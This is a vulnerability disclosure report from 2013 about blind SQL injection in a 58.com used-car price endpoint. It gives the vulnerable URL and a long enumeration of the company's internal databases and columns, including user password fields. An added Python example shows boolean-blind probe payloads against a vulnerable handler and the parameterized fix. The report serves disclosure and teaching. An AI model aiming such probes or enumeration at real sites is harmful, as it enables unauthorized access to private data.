
Vulnerability summary

Defect ID: wooyun-2013-021890

Title: One injection on 58 from the 非你莫属 special (not explored further for lack of time)

Vendor: 58同城

Author: 工作专用

Submitted: 2013-04-16 14:20

Fixed: 2013-05-31 14:21

Published: 2013-05-31 14:21

Vulnerability type: SQL injection

Severity: Medium

Self-rated Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-04-16: Details sent to the vendor, awaiting vendor handling
2013-04-16: Vendor confirmed; details disclosed to the vendor only
2013-04-26: Details disclosed to core white hats and relevant domain experts
2013-05-06: Details disclosed to regular white hats
2013-05-16: Details disclosed to intern white hats
2013-05-31: Details disclosed to the public

Brief description:

A vulnerability in 58同城! It came from 非你莫属. Something came up afterwards so I did not work through it carefully; blind injection takes too long.

Detailed description:

Blind injection. It came from 非你莫属. Something came up afterwards so I did not work through it carefully; blind injection takes too long.
Quite a lot of tables.
There is a back-end too.
Address:
http://hangqing.ershouche.58.com/queryhqChart.html?price=8.68&carlibid=269276&localid=1&madeyear=2008

[screenshot: 2.png]

[screenshot: 3.png]
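The URL in the report passes four numeric parameters (price, carlibid, localid, madeyear) into a used-car market-price lookup, and the blind-injection result shows that at least one of them reaches the SQL text unescaped. The script below is an added illustration, not code from the report or from 58.com: it builds a stand-in for the price.t_hangqing table from a subset of the columns the report enumerates, then runs the simplest boolean-blind probe against a handler that concatenates the parameters and against one that binds them. The sample rows, the handler names and the SQL are assumptions; the report does not say which parameter was injectable, so madeyear was chosen arbitrarily.

```python
"""
Added example, not code from the WooYun report or from 58.com: the same
queryhqChart lookup written two ways, one that concatenates request
parameters into the SQL text and one that binds them. The table uses a
subset of the t_hangqing columns listed in the report; the rows, the
function names and the SQL itself are assumptions made for illustration.
SQLite is used so the script runs offline.
"""
import sqlite3

# Constructed sample rows: (ModelID, MadeYear, LocalID, MinPrice, MaxPrice).
SAMPLE_ROWS = [
    (269276, 2008, 1, 7.9, 9.2),
    (269276, 2009, 1, 8.6, 9.9),
    (269276, 2008, 2, 7.5, 8.8),
    (100001, 2008, 1, 3.1, 3.9),
]


def build_db():
    """In-memory stand-in for the price.t_hangqing table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE t_hangqing (ModelID INTEGER, MadeYear INTEGER, "
        "LocalID INTEGER, MinPrice REAL, MaxPrice REAL)"
    )
    conn.executemany("INSERT INTO t_hangqing VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def query_vulnerable(conn, carlibid, localid, madeyear):
    """Deliberately vulnerable: the raw query-string values become SQL text,
    so madeyear='2008 AND 1=2' rewrites the WHERE clause itself."""
    sql = (
        "SELECT MinPrice, MaxPrice FROM t_hangqing "
        f"WHERE ModelID={carlibid} AND LocalID={localid} AND MadeYear={madeyear}"
    )
    return conn.execute(sql).fetchall()


def query_parameterized(conn, carlibid, localid, madeyear):
    """Hardened: enforce the integer type first (ValueError on anything else),
    then bind the values; the SQL text is constant whatever the input."""
    params = tuple(int(v) for v in (carlibid, localid, madeyear))
    sql = (
        "SELECT MinPrice, MaxPrice FROM t_hangqing "
        "WHERE ModelID=? AND LocalID=? AND MadeYear=?"
    )
    return conn.execute(sql, params).fetchall()


def boolean_oracle_present(handler, conn):
    """Send the classic boolean pair on madeyear and compare the responses.
    True  -> responses differ: the handler is a usable blind-injection oracle
    False -> responses identical: the payload was treated as data
    None  -> the handler rejected the input before running any SQL"""
    try:
        true_rows = handler(conn, "269276", "1", "2008 AND 1=1")
        false_rows = handler(conn, "269276", "1", "2008 AND 1=2")
    except ValueError:
        return None
    return true_rows != false_rows


if __name__ == "__main__":
    db = build_db()
    print("legitimate request:", query_parameterized(db, "269276", "1", "2008"))
    print("concatenated handler is an oracle:", boolean_oracle_present(query_vulnerable, db))
    print("parameterized handler is an oracle:", boolean_oracle_present(query_parameterized, db))
```

The two handlers return identical rows for a legitimate request; only the concatenated one answers the 1=1 and 1=2 pair differently, which is the entire signal a boolean-blind extraction needs. Binding alone would already make the payload a non-matching string, but converting to int first rejects it outright and is the right shape for every parameter on this endpoint.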

Proof of vulnerability (enumerated schema; each line is database, table, column):

DBWWW58COM_CompetitorAnalysis Rival_Cate ID
DBWWW58COM_CompetitorAnalysis Rival_Cate CateID
DBWWW58COM_CompetitorAnalysis Rival_Cate CityID
DBWWW58COM_CompetitorAnalysis Rival_Cate UrlByGanJiG
DBWWW58COM_CompetitorAnalysis Rival_Cate UrlByGanJiZ
DBWWW58COM_CompetitorAnalysis Rival_Cate UrlByBaiXingG
DBWWW58COM_CompetitorAnalysis Rival_Cate UrlByBaiXingZ
DBWWW58COM_CompetitorAnalysis Rival_Cate State
DBWWW58COM_CompetitorAnalysis Rival_Cate StartPageGanJi
DBWWW58COM_CompetitorAnalysis Rival_Cate StepGanJi
DBWWW58COM_CompetitorAnalysis Rival_Cate StartPageBaiXing
DBWWW58COM_CompetitorAnalysis Rival_Cate StepBaiXing
DBWWW58COM_CompetitorAnalysis Rival_Count ID
DBWWW58COM_CompetitorAnalysis Rival_Count CateID
DBWWW58COM_CompetitorAnalysis Rival_Count CityID
DBWWW58COM_CompetitorAnalysis Rival_Count Count58G
DBWWW58COM_CompetitorAnalysis Rival_Count Count58Z
DBWWW58COM_CompetitorAnalysis Rival_Count CountGanJiG
DBWWW58COM_CompetitorAnalysis Rival_Count CountGanJiZ
DBWWW58COM_CompetitorAnalysis Rival_Count CountBaiXingG
DBWWW58COM_CompetitorAnalysis Rival_Count CountBaiXingZ
DBWWW58COM_CompetitorAnalysis Rival_Count AddTime
DBWWW58COM_CompetitorAnalysis Rival_Count UpdateTime
DBWWW58COM_CompetitorAnalysis Rival_Count Count58GAddTime
DBWWW58COM_CompetitorAnalysis Rival_Count Count58ZAddTime
DBWWW58COM_CompetitorAnalysis Rival_Count SpiderCount
Datatool downloadrecorder id
Datatool downloadrecorder userid
Datatool downloadrecorder downloadatime
Datatool downloadrecorder fileName
Datatool downloadrecorder sessionid
Datatool sqlrecorder id
Datatool sqlrecorder userid
Datatool sqlrecorder sessionId
Datatool sqlrecorder email
Datatool sqlrecorder subtime
Datatool sqlrecorder exectime
Datatool sqlrecorder isexecute
Datatool sqlrecorder resultstate
Datatool sqlrecorder url
Datatool sqlrecorder sqlstr
Mail_Data All_Site_Key_Data datadate
Mail_Data All_Site_Key_Data AllSite_PV
Mail_Data All_Site_Key_Data AllSite_UV
Mail_Data All_Site_Key_Data Search_Use_Num
Mail_Data All_Site_Key_Data UserRegCount
Mail_Data All_Site_Key_Data UserMobileRegCount
Mail_Data All_Site_Key_Data InfoCount
Mail_Data All_Site_Key_Data Mobile_Au
Mail_Data All_Site_Key_Data Email_Au
Mail_Data All_Site_Key_Data Real_Au
Mail_Data All_Site_Key_Data Enterprise_Au
Mail_Data CateConfig cateid
Mail_Data CateConfig decisive_factors
Mail_Data CateConfig affect_factors
Mail_Data CateConfig other
Mail_Data CateConfig price
Mail_Data Cate_Info_Count datadate
Mail_Data Cate_Info_Count Cate_Name
Mail_Data Cate_Info_Count EffCount
Mail_Data Cate_Info_Count UserCount
Mail_Data Cate_Info_Count WAPCount
Mail_Data Cate_Info_Count CollCount
Mail_Data Cate_Visit_Sta datadate
Mail_Data Cate_Visit_Sta cate
Mail_Data Cate_Visit_Sta UV
Mail_Data Cate_Visit_Sta PV
Mail_Data Cate_Visit_Sta Stay_Avg
Mail_Data Cate_Visit_Sta Jump_In
Mail_Data Cate_Visit_Sta Jump_Out
Mail_Data Cate_Visit_Sta Bounce
Mail_Data Cate_Visit_Sta Stay
Mail_Data Im_Sta datadate
Mail_Data Im_Sta target_desc
Mail_Data Im_Sta target
Mail_Data Im_Sta target_value
Mail_Data Search_Data datadate
Mail_Data Search_Data search_num
Mail_Data Search_Data detail_see_num
Mail_Data Search_Data search_has_result
Mail_Data Search_Data search_see_detail
Mail_Data Search_Data search_jump
Mail_Data Visit_Source_Data datadate
Mail_Data Visit_Source_Data Ref
Mail_Data Visit_Source_Data UV
Mail_Data Visit_Source_Data PV
Mail_Data Visit_Source_Data Stay_Avg
Mail_Data Visit_Source_Data Jump_Out
Mail_Data Visit_Source_Data Bounce
Mail_Data Visit_Source_Data Stay
Mail_Data dim_mail_cate topcateid
Mail_Data dim_mail_cate mail_cate_desc
Mail_Data dim_mail_cate stat_DispCate_desc
Mail_Data etl_log datadate
Mail_Data etl_log table_name
Mail_Data etl_log flag
Mail_Data etl_log etl_start_time
Mail_Data etl_log etl_end_date
SDATA Dim_Topcate cate
SDATA Dim_Topcate catename
SDATA Im_Dim id
SDATA Im_Dim target_desc
SDATA Im_Dim target
SDATA Sdata_Click_Weight_Change datadate
SDATA Sdata_Click_Weight_Change change_time
SDATA Sdata_Click_Weight_Change infoid
SDATA Sdata_Click_Weight_Change phone
SDATA Sdata_Click_Weight_Change paixu
SDATA Sdata_Click_Weight_Change sortid
SDATA Sdata_Click_Weight_Change count
SDATA Sdata_Click_Weight_Change cateid
SDATA Sdata_Click_Weight_Change localid
SDATA Sdata_Click_Weight_Change isbiz
SDATA Sdata_Messege datadate
SDATA Sdata_Messege sendtime
SDATA Sdata_Messege bizcode
SDATA Sdata_Messege mobile
SDATA Sdata_Messege content
SDATA Sdata_Messege sendresult
SDATA Sdata_Messege myselfcode
SDATA Sdata_Mo datadate
SDATA Sdata_Mo number
SDATA Sdata_Mo content
SDATA Sdata_Mo recvtime
SDATA Sdata_Mo pushtime
SDATA Sdata_Mo command
SDATA Sdata_U_StatAll datadate
SDATA Sdata_U_StatAll AllCount
SDATA Sdata_U_StatAll UserCount
SDATA Sdata_U_StatAll CollCount
SDATA Sdata_U_StatAll WAPCount
SDATA Sdata_U_StatAll DelCount
SDATA Sdata_U_StatAll DelRate
SDATA Sdata_U_StatAll EffCount
SDATA Sdata_U_StatAll PicCount
SDATA Sdata_U_StatAll UserRegCount
SDATA Sdata_U_StatAll CommentCount
SDATA Sdata_U_StatAll VoteCount
SDATA Sdata_U_StatAll UserLogin
SDATA Sdata_U_StatAll MsgCount
SDATA Sdata_U_StatAll FriendCount
SDATA Sdata_U_StatAll AuditCount
SDATA Sdata_U_StatAll PartCount
SDATA Sdata_U_StatAll RefreshCount
SDATA Sdata_U_StatAll RepeatCount
SDATA Sdata_U_StatAll UserRegHisCount
SDATA Sdata_U_StatAuthentication datadate
SDATA Sdata_U_StatAuthentication MobileAll
SDATA Sdata_U_StatAuthentication MobliePass
SDATA Sdata_U_StatAuthentication EmailAll
SDATA Sdata_U_StatAuthentication EmailPass
SDATA Sdata_U_StatAuthentication RealAll
SDATA Sdata_U_StatAuthentication RealPass
SDATA Sdata_U_StatAuthentication RealNoPass
SDATA Sdata_U_StatAuthentication RealCannel
SDATA Sdata_U_StatAuthentication EnterpriseAll
SDATA Sdata_U_StatAuthentication EnterprisePass
SDATA Sdata_U_StatAuthentication EnterpriseNoPass
SDATA Sdata_U_StatAuthentication EnterpriseCannel
SDATA Sdata_U_StatCateCity datadate
SDATA Sdata_U_StatCateCity AllCount
SDATA Sdata_U_StatCateCity UserCount
SDATA Sdata_U_StatCateCity CollCount
SDATA Sdata_U_StatCateCity WAPCount
SDATA Sdata_U_StatCateCity DelCount
SDATA Sdata_U_StatCateCity DelRate
SDATA Sdata_U_StatCateCity EffCount
SDATA Sdata_U_StatCateCity PicCount
SDATA Sdata_U_StatCateCity CateID
SDATA Sdata_U_StatCateCity CityID
SDATA Sdata_U_StatCateCity PartCount
SDATA Sdata_U_StatCateCity RefreshCount
SDATA Sdata_U_StatCateCity RepeatCount
SDATA Sdata_U_StatCateCity ManualCheck
SDATA Sdata_U_StatCateCity AutomaticCheck
SDATA Sdata_U_StatCateCity AutomaticNoCheck
SDATA Sdata_U_StatCateCity RefreshAgentCount
SDATA Sdata_U_StatCateCity RefreshPersonalCount
SDATA Sdata_U_StatNewUserInfo datadate
SDATA Sdata_U_StatNewUserInfo InfoCount
SDATA Sdata_U_StatNewUserInfo NotInfoCount
SDATA Sdata_U_StatNewUserInfo OldUserLoginCount
SDATA Sdata_U_StatNewUserInfo OldUserInfoCount
SDATA Sdata_U_StatUserReg datadate
SDATA Sdata_U_StatUserReg RegCount
SDATA Sdata_Weight_Change datadate
SDATA Sdata_Weight_Change changetime
SDATA Sdata_Weight_Change change_type
SDATA Sdata_Weight_Change uid
SDATA Sdata_Weight_Change infoid
SDATA Sdata_Weight_Change infosource
SDATA Sdata_Weight_Change cateid
SDATA Sdata_Weight_Change time
SDATA etl_log datadate
SDATA etl_log table_name
SDATA etl_log flag
SDATA etl_log etl_start_time
SDATA etl_log etl_end_date
Watson 3chComplain inforid
Watson 3chComplain effect
Watson 3chComplain cateid
Watson 3chComplain compid
Watson 3chComplain sourceid
Watson 3chComplain infourl
Watson 3chComplain user
Watson 3chComplain inforcontext
Watson 3chComplain remark
Watson 3chComplain aimid
Watson 3chComplain subtime
Watson compaim aimid
Watson compaim aimname
Watson inforsource sourceid
Watson inforsource sourcename
datamining auth_group id
datamining auth_group name
datamining auth_group_permissions id
datamining auth_group_permissions group_id
datamining auth_group_permissions permission_id
datamining auth_message id
datamining auth_message user_id
datamining auth_message message
datamining auth_permission id
datamining auth_permission name
datamining auth_permission content_type_id
datamining auth_permission codename
datamining auth_user id
datamining auth_user username
datamining auth_user first_name
datamining auth_user last_name
datamining auth_user email
datamining auth_user password
datamining auth_user is_staff
datamining auth_user is_active
datamining auth_user is_superuser
datamining auth_user last_login
datamining auth_user date_joined
datamining auth_user_groups id
datamining auth_user_groups user_id
datamining auth_user_groups group_id
datamining auth_user_user_permissions id
datamining auth_user_user_permissions user_id
datamining auth_user_user_permissions permission_id
datamining django_admin_log id
datamining django_admin_log action_time
datamining django_admin_log user_id
datamining django_admin_log content_type_id
datamining django_admin_log object_id
datamining django_admin_log object_repr
datamining django_admin_log action_flag
datamining django_admin_log change_message
datamining django_content_type id
datamining django_content_type name
datamining django_content_type app_label
datamining django_content_type model
datamining django_session session_key
datamining django_session session_data
datamining django_session expire_date
datamining django_site id
datamining django_site domain
datamining django_site name
datamining fangchanprice_zz id
datamining fangchanprice_zz xiaoquid
datamining fangchanprice_zz shi
datamining fangchanprice_zz isluxury
datamining fangchanprice_zz meanprice
datamining fangchanprice_zz minprice
datamining fangchanprice_zz maxprice
datamining fangchanprice_zz min_deleteprice
datamining fangchanprice_zz max_deleteprice
datamining fangchanprice_zz min_weightprice
datamining fangchanprice_zz max_weightprice
datamining fangchanprice_zz cateid
datamining fangchanprice_zz insertdate
datamining fangchanrecommend_zz id
datamining fangchanrecommend_zz xiaoquid
datamining fangchanrecommend_zz shi
datamining fangchanrecommend_zz isluxury
datamining fangchanrecommend_zz ting
datamining fangchanrecommend_zz wei
datamining fangchanrecommend_zz fitment
datamining fangchanrecommend_zz recommend_infoid
datamining fangchanrecommend_zz cateid
datamining fangchanrecommend_zz insertdate
datamining param id
datamining param paramKey
datamining param paramValue
datamining param lastModifyTime
datamining priceResult id
datamining priceResult cateid
datamining priceResult brand
datamining priceResult type
datamining priceResult meanPrice
datamining priceResult maxPrice
datamining priceResult minPrice
datamining priceResult startPrice
datamining priceResult endPrice
datamining priceResult weight
datamining priceResult freq
datamining priceResult seq
datamining priceResult quality
datamining priceResult lastModifyDate
datamining priceResult refPrice
datamining priceResult modifyUser
datamining priceResult status
datamining refPrice id
datamining refPrice brand
datamining refPrice type
datamining refPrice subtype
datamining refPrice price
datamining refPrice lastModifyDate
datamining secInfo infoId
datamining secInfo cateId
datamining secInfo brand
datamining secInfo type
datamining secInfo price
datamining secInfo refPrice
datamining secInfo quality
datamining secInfo isBiz
datamining secInfo params
datamining secInfo logDate
datamining shoujiPrice id
datamining shoujiPrice brand
datamining shoujiPrice brand_id
datamining shoujiPrice type
datamining shoujiPrice type_id
datamining shoujiPrice quality
datamining shoujiPrice ipone_cpu
datamining shoujiPrice ipone_version
datamining shoujiPrice meanPrice
datamining shoujiPrice varprice
datamining shoujiPrice maxPrice
datamining shoujiPrice minPrice
datamining shoujiPrice price
datamining shoujiPrice lastModifyDate
datamining shoujiPrice status
datamining t_2s_computerprice id
datamining t_2s_computerprice brand_id
datamining t_2s_computerprice series_id
datamining t_2s_computerprice quality_id
datamining t_2s_computerprice cpu_id
datamining t_2s_computerprice minprice
datamining t_2s_computerprice maxprice
datamining t_2s_computerprice price
datamining t_2s_computerprice modify_date
datamining t_2s_computerprice newPrice
datamining t_2s_ipodprice id
datamining t_2s_ipodprice brand_id
datamining t_2s_ipodprice model_id
datamining t_2s_ipodprice quality_id
datamining t_2s_ipodprice ipod_mem_id
datamining t_2s_ipodprice minprice
datamining t_2s_ipodprice maxprice
datamining t_2s_ipodprice price
datamining t_2s_ipodprice modify_date
datamining t_2s_ipodprice newPrice
datamining t_2s_pbprice id
datamining t_2s_pbprice brand_id
datamining t_2s_pbprice model_id
datamining t_2s_pbprice quality_id
datamining t_2s_pbprice ipad_mem_id
datamining t_2s_pbprice ipad_ver_id
datamining t_2s_pbprice ipad_wf_id
datamining t_2s_pbprice minprice
datamining t_2s_pbprice price
datamining t_2s_pbprice maxprice
datamining t_2s_pbprice modify_date
datamining t_2s_pbprice newPrice
datamining t_2s_pbprice fraudminprice
datamining t_2s_pbprice fraudmaxprice
datamining t_2s_sjprice id
datamining t_2s_sjprice brand_id
datamining t_2s_sjprice model_id
datamining t_2s_sjprice quality_id
datamining t_2s_sjprice iphone_mem_id
datamining t_2s_sjprice iphone_ver_id
datamining t_2s_sjprice minprice
datamining t_2s_sjprice maxprice
datamining t_2s_sjprice price
datamining t_2s_sjprice modify_date
datamining t_2s_sjprice newPrice
datamining t_2s_sjprice fraudminprice
datamining t_2s_sjprice fraudmaxprice
datamining t_2s_sjprice_copy id
datamining t_2s_sjprice_copy brand_id
datamining t_2s_sjprice_copy model_id
datamining t_2s_sjprice_copy quality_id
datamining t_2s_sjprice_copy iphone_mem_id
datamining t_2s_sjprice_copy iphone_ver_id
datamining t_2s_sjprice_copy minprice
datamining t_2s_sjprice_copy maxprice
datamining t_2s_sjprice_copy price
datamining t_2s_sjprice_copy modify_date
datamining t_2s_sjprice_copy newPrice
datamining t_2s_sjprice_copy fraudminprice
datamining t_2s_sjprice_copy fraudmaxprice
datamining t_2s_xjprice id
datamining t_2s_xjprice brand_id
datamining t_2s_xjprice model_id
datamining t_2s_xjprice quality_id
datamining t_2s_xjprice dfxj_id
datamining t_2s_xjprice minprice
datamining t_2s_xjprice maxprice
datamining t_2s_xjprice price
datamining t_2s_xjprice modify_date
datamining t_2s_xjprice newPrice
datamining t_2s_yxjprice id
datamining t_2s_yxjprice brand_id
datamining t_2s_yxjprice model_id
datamining t_2s_yxjprice quality_id
datamining t_2s_yxjprice yxj_ver_id
datamining t_2s_yxjprice minprice
datamining t_2s_yxjprice maxprice
datamining t_2s_yxjprice price
datamining t_2s_yxjprice modify_date
datamining t_2s_yxjprice newPrice
fangchan fangchanprice_zz id
fangchan fangchanprice_zz xiaoquid
fangchan fangchanprice_zz shi
fangchan fangchanprice_zz isluxury
fangchan fangchanprice_zz meanprice
fangchan fangchanprice_zz minprice
fangchan fangchanprice_zz maxprice
fangchan fangchanprice_zz min_deleteprice
fangchan fangchanprice_zz max_deleteprice
fangchan fangchanprice_zz min_weightprice
fangchan fangchanprice_zz max_weightprice
fangchan fangchanprice_zz cateid
fangchan fangchanprice_zz insertdate
fangchan fangchanrecommend_zz id
fangchan fangchanrecommend_zz xiaoquid
fangchan fangchanrecommend_zz shi
fangchan fangchanrecommend_zz isluxury
fangchan fangchanrecommend_zz ting
fangchan fangchanrecommend_zz wei
fangchan fangchanrecommend_zz fitment
fangchan fangchanrecommend_zz recommend_infoid
fangchan fangchanrecommend_zz cateid
fangchan fangchanrecommend_zz insertdate
hbaseMailData ClickResult datadate
hbaseMailData ClickResult cate
hbaseMailData ClickResult city
hbaseMailData ClickResult pv
hbaseMailData ClickResult uv
hbaseMailData ClickResult visitor
hbaseMailData ClickResult jumpin
hbaseMailData ClickResult jumpout
hbaseMailData DetailLogCount time
hbaseMailData DetailLogCount cate
hbaseMailData DetailLogCount area
hbaseMailData DetailLogCount souOutPv
hbaseMailData DetailLogCount detailUv
hbaseMailData DetailLogCount vistsCount
hbaseMailData DetailLogCount souToPv
hbaseMailData DetailLogCount listToPv
hbaseMailData DetailLogCount detailPv
hbaseMailData InfoResult datadate
hbaseMailData InfoResult cate
hbaseMailData InfoResult city
hbaseMailData InfoResult uidCountAgent
hbaseMailData InfoResult uidCount
hbaseMailData InfoResult uidCountPerson
hbaseMailData InfoResult allIsBiz
hbaseMailData InfoResult wapInfoAgentCount
hbaseMailData InfoResult refreshInfoAgentCount
hbaseMailData InfoResult checkPassCount
hbaseMailData InfoResult crawlInfoAgentCount
hbaseMailData InfoResult checkPassAgentCount
hbaseMailData InfoResult checkPassPersonCount
hbaseMailData InfoResult wapInfoCount
hbaseMailData InfoResult allCount
hbaseMailData InfoResult checkManualCount
hbaseMailData InfoResult checkAutoPassCount
hbaseMailData InfoResult newInfoCount
hbaseMailData InfoResult newInfoPersonCount
hbaseMailData InfoResult updateInfoAgentCount
hbaseMailData InfoResult delInfoCount
hbaseMailData InfoResult wapInfoPersonCount
hbaseMailData InfoResult updateInfoCount
hbaseMailData InfoResult checkAutoNotPassCount
hbaseMailData InfoResult delInfoAgentCount
hbaseMailData InfoResult crawlInfoPersonCount
hbaseMailData InfoResult crawlInfoCount
hbaseMailData InfoResult newInfoAgentCount
hbaseMailData InfoResult updateInfoPersonCount
hbaseMailData InfoResult refreshInfoCount
hbaseMailData InfoResult refreshInfoPersonCount
hbaseMailData InfoResult allIsPerson
hbaseMailData InfoResult delInfoPersonCount
hbaseMailData ListAnalytics datadate
hbaseMailData ListAnalytics actionCate
hbaseMailData ListAnalytics actionArea
hbaseMailData ListAnalytics actionToDetailUv
hbaseMailData ListAnalytics actionVisit
hbaseMailData ListAnalytics actionPv
hbaseMailData ListAnalytics actionBounce
hbaseMailData ListAnalytics actionOneToDetailPV
hbaseMailData ListAnalytics actionVisitResult
hbaseMailData ListAnalytics actionLand
hbaseMailData ListAnalytics actionNoResult
hbaseMailData ListAnalytics actionUv
hbaseMailData ListAnalytics actionOnePv
hbaseMailData ListAnalytics actionMoreResult
hbaseMailData ListAnalytics actionType
hbaseMailData ListAnalytics actionToDetailPv
hbaseMailData ListAnalytics actionExit
price CateConfig cateid
price CateConfig decisive_factors
price CateConfig affect_factors
price CateConfig other
price CateConfig price
price FilterConfig id
price FilterConfig cateid
price FilterConfig param1
price FilterConfig min_value1
price FilterConfig max_value1
price FilterConfig param2
price FilterConfig value2
price FilterConfig param3
price FilterConfig value3
price FilterConfig min_price
price FilterConfig max_price
price ModelConfig id
price ModelConfig cateid
price ModelConfig dividenum
price ModelConfig gotnum
price ModelConfig restorefactor
price ModelConfig recrate
price fangchanprice_zz id
price fangchanprice_zz xiaoquid
price fangchanprice_zz shi
price fangchanprice_zz isluxury
price fangchanprice_zz meanprice
price fangchanprice_zz minprice
price fangchanprice_zz maxprice
price fangchanprice_zz min_deleteprice
price fangchanprice_zz max_deleteprice
price fangchanprice_zz min_weightprice
price fangchanprice_zz max_weightprice
price fangchanprice_zz cateid
price fangchanprice_zz insertdate
price jobparams ID
price jobparams CateID
price jobparams ParamValue
price jobparams AddTime
price jobsalary ID
price jobsalary CateID
price jobsalary DispJobID
price jobsalary CityID
price jobsalary SalaryDown
price jobsalary SalaryUp
price jobsalary AddTime
price t_2s_computerprice id
price t_2s_computerprice brand_id
price t_2s_computerprice series_id
price t_2s_computerprice quality_id
price t_2s_computerprice cpu_id
price t_2s_computerprice minprice
price t_2s_computerprice maxprice
price t_2s_computerprice price
price t_2s_computerprice modify_date
price t_2s_computerprice newPrice
price t_2s_ipodprice id
price t_2s_ipodprice brand_id
price t_2s_ipodprice model_id
price t_2s_ipodprice quality_id
price t_2s_ipodprice ipod_mem_id
price t_2s_ipodprice minprice
price t_2s_ipodprice maxprice
price t_2s_ipodprice price
price t_2s_ipodprice modify_date
price t_2s_ipodprice newPrice
price t_2s_pbprice id
price t_2s_pbprice brand_id
price t_2s_pbprice model_id
price t_2s_pbprice quality_id
price t_2s_pbprice ipad_mem_id
price t_2s_pbprice ipad_ver_id
price t_2s_pbprice ipad_wf_id
price t_2s_pbprice minprice
price t_2s_pbprice price
price t_2s_pbprice maxprice
price t_2s_pbprice modify_date
price t_2s_pbprice newPrice
price t_2s_pbprice fraudminprice
price t_2s_pbprice fraudmaxprice
price t_2s_sjprice id
price t_2s_sjprice brand_id
price t_2s_sjprice model_id
price t_2s_sjprice quality_id
price t_2s_sjprice iphone_mem_id
price t_2s_sjprice iphone_ver_id
price t_2s_sjprice minprice
price t_2s_sjprice maxprice
price t_2s_sjprice price
price t_2s_sjprice modify_date
price t_2s_sjprice newPrice
price t_2s_sjprice fraudminprice
price t_2s_sjprice fraudmaxprice
price t_2s_xjprice id
price t_2s_xjprice brand_id
price t_2s_xjprice model_id
price t_2s_xjprice quality_id
price t_2s_xjprice dfxj_id
price t_2s_xjprice minprice
price t_2s_xjprice maxprice
price t_2s_xjprice price
price t_2s_xjprice modify_date
price t_2s_xjprice newPrice
price t_2s_yxjprice id
price t_2s_yxjprice brand_id
price t_2s_yxjprice model_id
price t_2s_yxjprice quality_id
price t_2s_yxjprice yxj_ver_id
price t_2s_yxjprice minprice
price t_2s_yxjprice maxprice
price t_2s_yxjprice price
price t_2s_yxjprice modify_date
price t_2s_yxjprice newPrice
price t_carlib CarLibID
price t_carlib ParentID
price t_carlib Title
price t_carlib Description
price t_carlib DispCateID
price t_carlib ListName
price t_carlib SortID
price t_carlib IsVisible
price t_carlib Type
price t_carlib ExtendID
price t_carlib ExtendValue
price t_carlib FullPath
price t_carlib Depth
price t_carlib Pic
price t_carlib CarLevelID
price t_carlib SellStatus
price t_carlib ProductionStatus
price t_carlib Status
price t_carlib MinPrice
price t_carlib MaxPrice
price t_carlib GearBox
price t_carlib Displacement
price t_carlib MadeIn
price t_carlibcmcs Carlibid
price t_carlibcmcs CmcsCarlibid
price t_hangqing ID
price t_hangqing FactoryID
price t_hangqing BrandID
price t_hangqing SeriesID
price t_hangqing ModelID
price t_hangqing MadeYear
price t_hangqing MinPrice
price t_hangqing MaxPrice
price t_hangqing CreateYear
price t_hangqing CreateMonth
price t_hangqing CreateTime
price t_hangqing LevelID
price t_hangqing LocalID
price t_hangqing NewMinPrice
price t_hangqing NewMaxPrice
price t_hangqing GuidePrice
price t_hangqing Displacement
price t_hangqing_allcity ID
price t_hangqing_allcity FactoryID
price t_hangqing_allcity BrandID
price t_hangqing_allcity SeriesID
price t_hangqing_allcity ModelID
price t_hangqing_allcity MadeYear
price t_hangqing_allcity MinPrice
price t_hangqing_allcity MaxPrice
price t_hangqing_allcity CreateYear
price t_hangqing_allcity CreateMonth
price t_hangqing_allcity CreateTime
price t_hangqing_allcity LevelID
price t_hangqing_allcity LocalID
price t_hangqing_allcity NewMinPrice
price t_hangqing_allcity NewMaxPrice
price t_hangqing_allcity GuidePrice
price t_hangqing_allcity Displacement
price t_hangqing_allcity_carage ID
price t_hangqing_allcity_carage FactoryID
price t_hangqing_allcity_carage BrandID
price t_hangqing_allcity_carage SeriesID
price t_hangqing_allcity_carage ModelID
price t_hangqing_allcity_carage MadeYear
price t_hangqing_allcity_carage MinPrice
price t_hangqing_allcity_carage MaxPrice
price t_hangqing_allcity_carage CreateYear
price t_hangqing_allcity_carage CreateMonth
price t_hangqing_allcity_carage CreateTime
price t_hangqing_allcity_carage LevelID
price t_hangqing_allcity_carage LocalID
price t_hangqing_allcity_carage NewMinPrice
price t_hangqing_allcity_carage NewMaxPrice
price t_hangqing_allcity_carage GuidePrice
price t_hangqing_allcity_carage Displacement
price t_hangqing_carage ID
price t_hangqing_carage FactoryID
price t_hangqing_carage BrandID
price t_hangqing_carage SeriesID
price t_hangqing_carage ModelID
price t_hangqing_carage MadeYear
price t_hangqing_carage MinPrice
price t_hangqing_carage MaxPrice
price t_hangqing_carage CreateYear
price t_hangqing_carage CreateMonth
price t_hangqing_carage CreateTime
price t_hangqing_carage LevelID
price t_hangqing_carage LocalID
price t_hangqing_carage NewMinPrice
price t_hangqing_carage NewMaxPrice
price t_hangqing_carage GuidePrice
price t_hangqing_carage Displacement
price t_petprice breedId
price t_petprice breedName
price t_petprice price
price t_petprice insertdate
priceAudit fangchanprice_zz_audit id
priceAudit fangchanprice_zz_audit xiaoquid
priceAudit fangchanprice_zz_audit shi
priceAudit fangchanprice_zz_audit isluxury
priceAudit fangchanprice_zz_audit meanprice
priceAudit fangchanprice_zz_audit minprice
priceAudit fangchanprice_zz_audit maxprice
priceAudit fangchanprice_zz_audit min_weightprice
priceAudit fangchanprice_zz_audit max_weightprice
priceAudit fangchanprice_zz_audit cateid
priceAudit fangchanprice_zz_audit insertdate
priceAudit fangchanprice_zz_audit state
priceAudit t_2s_computerprice_audit id
priceAudit t_2s_computerprice_audit brand_id
priceAudit t_2s_computerprice_audit series_id
priceAudit t_2s_computerprice_audit quality_id
priceAudit t_2s_computerprice_audit cpu_id
priceAudit t_2s_computerprice_audit minprice
priceAudit t_2s_computerprice_audit maxprice
priceAudit t_2s_computerprice_audit price
priceAudit t_2s_computerprice_audit modify_date
priceAudit t_2s_computerprice_audit newPrice
priceAudit t_2s_computerprice_audit state
priceAudit t_2s_ipodprice_audit id
priceAudit t_2s_ipodprice_audit brand_id
priceAudit t_2s_ipodprice_audit model_id
priceAudit t_2s_ipodprice_audit quality_id
priceAudit t_2s_ipodprice_audit ipod_mem_id
priceAudit t_2s_ipodprice_audit minprice
priceAudit t_2s_ipodprice_audit maxprice
priceAudit t_2s_ipodprice_audit price
